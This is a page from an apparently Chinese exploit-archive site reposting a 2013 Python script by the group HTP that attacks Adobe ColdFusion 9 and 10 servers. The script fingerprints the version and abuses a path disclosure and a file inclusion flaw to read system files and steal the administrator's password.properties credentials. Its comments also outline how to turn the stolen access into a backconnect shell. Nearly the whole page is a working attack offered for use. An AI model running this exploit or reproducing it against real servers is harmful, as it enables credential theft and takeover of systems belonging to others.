首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ColdFusion 9 / 10 Remote Root Exploit
来源:vfocus.net 作者:HTP 发布时间:2013-05-09  
#!/usr/bin/env python
# -*- coding: utf-8 -*-

intro="""
 _     _ _______  _____       _    _ _______        Cold        ,''' Fusion
 |_____|    |    |_____]       \  /  |______        Cold ,'''  /--   Fusion
 |     |    |    |              \/   ______|.       Cold -,__,'      Fusion

Name        : ColdSub-Zero.pyFusion v2
Description : CF9-10 Remote Root Zeroday
Crew        : HTP
"""
cyan = "\x1b[1;36m"
red = "\x1b[1;31m"
clear = "\x1b[0m"
print intro.replace("Cold",cyan).replace("Fusion",clear)

import requests, time, sys, urllib, hashlib

def flash(color,text,times):
  sys.stdout.write(text)
  line1 = "\x0d\x1b[2K%s%s" % (color,text)
  line2 = "\x0d\x1b[2K%s%s" % (clear,text)
  for x in range(0,times):
    sys.stdout.write(line1)
    sys.stdout.flush()
    time.sleep(.2)
    sys.stdout.write(line2)
    sys.stdout.flush()
    time.sleep(.2)
  print line2

abspath = ""
operatingsystem = "refrigerator"
coldfusion = 0

def fingerprintcf(protocol,target):
  # Fingerprint using md5's of CF 9/10 admin image
  print "[*] Fingerprinting CF 9/10 instance"
  imgdata = requests.get("%s://%s/CFIDE/administrator/images/loginbackground.jpg" % (protocol,target)).content
  md5fingerprint = hashlib.md5(imgdata).hexdigest()
  if md5fingerprint == "a4c81b7a6289b2fc9b36848fa0cae83c":
    print "[*] Detected ColdFusion 10"
    return 10
  elif md5fingerprint == "596b3fc4f1a0b818979db1cf94a82220":
    print "[*] Detected ColdFusion 9"
    return 9
  elif md5fingerprint == "779efc149954677095446c167344dbfc":
    # ColdFusion 8 doesn't have mail.cfm, but it is still exploitable due to l10n parsing the template as CFM.
    # It would require shell data to be on the box to include, such as an uploaded 'picture' or what-not.
    print "[*] Requires inclusion: m4ke your 0wn fuq1ng z3r0d4y!"
    sys.exit(0)
  else:
    print "[*] Unable to fingerprint, continuing with little environment data"
    return None

def getpath(protocol,target):
  # Leverage a path disclosure to get the absolute path on CF9-10
  print "[*] Testing for path disclosure"
  abspathdata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).headers
  if "set-cookie" in abspathdata.keys():
    try:
      abspath = urllib.unquote(abspathdata['set-cookie'].split('ANALYZER_DIRECTORY=')[1].split(';')[0])
      print "[*] Absolute path obtained: %s" % abspath
      if abspath[0] == "/":
        print "[*] Detected Linux"
        operatingsystem = "linux"
      elif abspath[1] == ":":
        print "[*] Detected Windows"
        operatingsystem = "windows 95 with bonzibuddy"
      else:
        print "[?] t4rg3t 4pp34r5 t0 b3 runn1n9 0n 4 r3fr1g3r4t0r"
        operatingsystem = "refrigerator"
    except:
      print "[?] OS detection failure. Continuing with fingerprint."
  else:
    print "[?] OS detection failure. Continuing with fingerprint."
  return abspath,operatingsystem

# HTP '13
# Congratulations, you're reading the source.
#
# Subzero v2 is a do-it-yourself Subzero v1. Some details have been provided throughout the source hinting at the potential usage.
# As far as changes, the Null RDS 1day has been removed, as well as the locale + FCKEditor exploitation checks & auth bypass + shell drop.
# If you know what you are doing, this 0day can be used in conjunction with the other 0days to exploit ColdFusion 6-10. (aka everything).
#
# ColdFusion 6 can be taken out with the locale 0day, and XORing password.properties against the stored private key will yield the actual
# login password.
#
# Since you're reading the source, we'll give you another 0day to improve Subzero. Once Subzero has extracted the hash, use scheduled tasks
# to store your backconnect shell in a temp directory (such as the CF temp directory/windows TEMP dir or /dev/shm). Then, use Server Settings
# > Settings in the CF admin to load it as the Missing Template Handler (you can travel upwards from the 'relative path' using ../). Finally,
# trigger a 404 to recieve your backconnect, and restore the Missing Template Handler. We might release fUZE Shell v2 in the future for POCs
# of this written in CFML.
#
# For anyone looking to fully weaponize Subzero into direct RXE for ColdFusion 10, we'll give you a hint. Subzero is a LFI, not a LFD.
# (preinstalled *.cfm) :P

target = raw_input("Target> ")
if "https" in target:
  protocol = "https"
  target = target.replace("http://","").replace("https://","").split("/")[0]
  print "[*] Target set to: %s" % target
  print "[*] HTTPS: Enabled"
else:
  protocol = "http"
  target = target.replace("http://","").replace("https://","").split("/")[0]
  print "[*] Target set to: %s" % target

abspath,operatingsystem = getpath(protocol,target)
coldfusion = fingerprintcf(protocol,target)

print "[*] Collecting additional data about operating system"
etchosts = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).content
bootini = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../boot.ini&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target)).content
if "hosts" in etchosts or "127.0.0.1" in etchosts:
  operatingsystem = "linux"
elif "[boot loader]" in bootini or "[operating systems]" in bootini:
  operatingsystem = "windows 95 with bonzibuddy"
elif operatingsystem is "linux" or "windows 95 with bonzibuddy":
  pass
else:
  operatingsystem = "refrigerator"

if operatingsystem is "refrigerator":
  print "[*] go0d 1uq!!"

print "[*] Obtaining credentials"
tests = ["../../lib/password.properties","..\..\lib\password.properties"]
if operatingsystem is "windows 95 with bonzibuddy":
  if coldfusion == 10:
    tests += ["..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
  elif coldfusion == 9:
    tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
  else:
    tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
                          "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"]
elif operatingsystem is "linux":
  if coldfusion == 10:
    tests += ["../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
                          "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
  elif coldfusion == 9:
    tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
                          "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
  else:
    tests += ["../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
                          "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
                          "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]
elif operatingsystem is "refrigerator":
  # w3lp l00ks l1k3 w3 g0tt4 5h0tguN th1s sh1t
  tests += ["..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties",
                  "..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties",
                  "..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties",
                  "..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties",
                  "..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties",
                  "../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties",
                  "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
                  "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties"]

for path in tests:
  lfidata = requests.get("%s://%s/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=%s&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" % (protocol,target,path)).content
  if "encrypted=true" in lfidata:
    credzacquired = True
    print "[*] CF Administrator credentials acquired:"
    print lfidata
  else:
    pass

if credzacquired == True:
  flash(cyan,"[~] SUB ZERO WINS",3)
  time.sleep(.5)
  flash(red,"[!] FLAWLESS VICTORY",3)
  time.sleep(.5)
else:
  flash(red,"[!] COLDFUSION ADMIN WINS",3)
  time.sleep(.5)

# e0f HTP '13


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MoinMelt Arbitrary Command Exe
·Flightgear 2.0, 2.4 - Remote F
·Dovecot with Exim sender_addre
·Linux Kernel open-time Capabil
·Microsoft Internet Explorer CG
·ERS Viewer 2011 ERS File Handl
·Huawei SNMPv3 Buffer Overflow
·Lan Messenger sending PM Buffe
·AudioCoder .M3U Buffer Overflo
·SAP SOAP RFC SXPG_COMMAND_EXEC
·Winarchiver 3.2 Buffer Overflo
·SAP SOAP RFC SXPG_CALL_SYSTEM
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved